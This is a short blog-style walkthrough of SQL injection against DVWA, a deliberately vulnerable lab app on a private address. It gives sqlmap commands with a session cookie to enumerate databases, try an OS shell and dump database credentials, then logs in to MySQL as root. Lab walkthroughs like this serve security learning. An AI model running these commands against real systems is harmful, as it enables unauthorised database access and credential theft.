Elha Site: Gaining Backdoor Through Sql

1. We go to see DVWA sql injection blind, and the link is:
http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/

2. Try to get variable from the page, that mean the variable will be used for sqlmap. And the variable in sqlmap are:

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --dbs

But not successfully. Than using cookie and try it again.

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --dbs

Now we get the list of databases:

3. We try to create shell with --os-shell

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --os-shell

But, seems like not successfully again.. So we try another way with access sql now.

4. Than, we edit the sqlmap to get user and password from sql

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --users --passwords

Finally we get the user and password. The user and password for sql are: root and NULL.

5. Now, we connect trough mysql

root@elha:/ubuntu# mysql -h 192.168.56.101 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.1.33 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>